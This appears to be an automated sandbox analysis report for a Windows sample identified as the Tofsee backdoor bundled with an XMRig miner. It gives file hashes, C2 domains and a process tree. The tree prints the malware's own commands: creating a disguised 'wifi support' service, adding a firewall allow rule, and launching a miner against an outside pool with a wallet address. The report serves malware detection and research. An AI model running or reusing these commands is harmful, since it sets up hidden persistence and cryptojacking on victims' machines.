Overview

overview

10

Static

static

file.exe

windows7-x64

10

file.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-10-2022 01:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    file.exe

  • Size

    260KB

  • MD5

    0977d24926bb7054965077aa47ae6eb9

  • SHA1

    2b257a3bd6e16788458ee4223ec8d0ebc3a8eea3

  • SHA256

    07699f780ad559ab0a8410f80033750202604736840d7880a11b37253dec5977

  • SHA512

    3fca1acce75d60239fa0373ac5608221294571c44e10fbe7cc92b7d9e01af4cd8e1a8e94fcb654c795a6c8b64aebb85535527b8f092f922b9385ec4e6f64ad7d

  • SSDEEP

    3072:/PiD0BaXzLdQlU/z5d3mt3pVaDhFVIVQC0ODopk3jf80Cxet1nsM/h3:g0BUzLqlFpVaDnVO0Ookz2x0ns

Score
10/10
tofseexmrigevasionminerpersistencetrojan

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 2 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:516
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hnbzagmx\
      2⤵
        PID:1344
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ukmzqit.exe" C:\Windows\SysWOW64\hnbzagmx\
        2⤵
          PID:3552
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create hnbzagmx binPath= "C:\Windows\SysWOW64\hnbzagmx\ukmzqit.exe /d\"C:\Users\Admin\AppData\Local\Temp\file.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:4952
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description hnbzagmx "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:3680
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start hnbzagmx
          2⤵
          • Launches sc.exe
          PID:2400
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:3560
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 1288
          2⤵
          • Program crash
          PID:1064
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 516 -ip 516
        1⤵
          PID:2056
        • C:\Windows\SysWOW64\hnbzagmx\ukmzqit.exe
          C:\Windows\SysWOW64\hnbzagmx\ukmzqit.exe /d"C:\Users\Admin\AppData\Local\Temp\file.exe"
          1⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:1260
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe
            2⤵
            • Sets service image path in registry
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Modifies data under HKEY_USERS
            • Suspicious use of WriteProcessMemory
            PID:4420
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:3104
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1260 -s 540
            2⤵
            • Program crash
            PID:3828
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1260 -ip 1260
          1⤵
            PID:4048

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\ukmzqit.exe
            Filesize

            14.2MB

            MD5

            1c5ea6e113546d2b7a2c7dee7daa5ddc

            SHA1

            b80abaecd87bfa26c65f94fea8ea76b266280b8e

            SHA256

            5da69a8e9d554d02d13f08461e158216ccd917a86765ed6ec7a050d055477bf8

            SHA512

            0108a0da6a0295184f8f55a7401976980fc2c24315e42cdcb60ed9fa1f1aa42a913b35a7cab760d66457fdb53cf262c40c62a014d2f873c3ff9c6d1245122abb

            Download Submit

          • C:\Windows\SysWOW64\hnbzagmx\ukmzqit.exe
            Filesize

            14.2MB

            MD5

            1c5ea6e113546d2b7a2c7dee7daa5ddc

            SHA1

            b80abaecd87bfa26c65f94fea8ea76b266280b8e

            SHA256

            5da69a8e9d554d02d13f08461e158216ccd917a86765ed6ec7a050d055477bf8

            SHA512

            0108a0da6a0295184f8f55a7401976980fc2c24315e42cdcb60ed9fa1f1aa42a913b35a7cab760d66457fdb53cf262c40c62a014d2f873c3ff9c6d1245122abb

            Download Submit

          • memory/516-133-0x0000000003080000-0x0000000003093000-memory.dmp

            Filesize

            76KB

            Download

          • memory/516-134-0x0000000000400000-0x0000000002C2F000-memory.dmp

            Filesize

            40.2MB

            Download

          • memory/516-132-0x0000000002E57000-0x0000000002E6D000-memory.dmp

            Filesize

            88KB

            Download

          • memory/516-144-0x0000000000400000-0x0000000002C2F000-memory.dmp

            Filesize

            40.2MB

            Download

          • memory/516-143-0x0000000002E57000-0x0000000002E6D000-memory.dmp

            Filesize

            88KB

            Download

          • memory/1260-151-0x0000000000400000-0x0000000002C2F000-memory.dmp

            Filesize

            40.2MB

            Download

          • memory/1260-149-0x0000000002F71000-0x0000000002F87000-memory.dmp

            Filesize

            88KB

            Download

          • memory/1344-135-0x0000000000000000-mapping.dmp

            Download

          • memory/2400-140-0x0000000000000000-mapping.dmp

            Download

          • memory/3104-171-0x0000000000000000-mapping.dmp

            Download

          • memory/3104-172-0x00000000004B1000-0x0000000000582000-memory.dmp

            Filesize

            836KB

            Download

          • memory/3104-177-0x00000000004B0000-0x00000000005A1000-memory.dmp

            Filesize

            964KB

            Download

          • memory/3104-173-0x00000000004B0000-0x00000000005A1000-memory.dmp

            Filesize

            964KB

            Download

          • memory/3552-136-0x0000000000000000-mapping.dmp

            Download

          • memory/3560-141-0x0000000000000000-mapping.dmp

            Download

          • memory/3680-139-0x0000000000000000-mapping.dmp

            Download

          • memory/4420-146-0x0000000001280000-0x0000000001295000-memory.dmp

            Filesize

            84KB

            Download

          • memory/4420-153-0x0000000002E00000-0x000000000300F000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/4420-156-0x00000000025F0000-0x00000000025F6000-memory.dmp

            Filesize

            24KB

            Download

          • memory/4420-159-0x0000000003110000-0x0000000003120000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4420-162-0x00000000033E0000-0x00000000033E5000-memory.dmp

            Filesize

            20KB

            Download

          • memory/4420-165-0x0000000007E00000-0x000000000820B000-memory.dmp

            Filesize

            4.0MB

            Download

          • memory/4420-168-0x00000000033F0000-0x00000000033F7000-memory.dmp

            Filesize

            28KB

            Download

          • memory/4420-152-0x0000000001280000-0x0000000001295000-memory.dmp

            Filesize

            84KB

            Download

          • memory/4420-150-0x0000000001280000-0x0000000001295000-memory.dmp

            Filesize

            84KB

            Download

          • memory/4420-145-0x0000000000000000-mapping.dmp

            Download

          • memory/4952-138-0x0000000000000000-mapping.dmp

            Download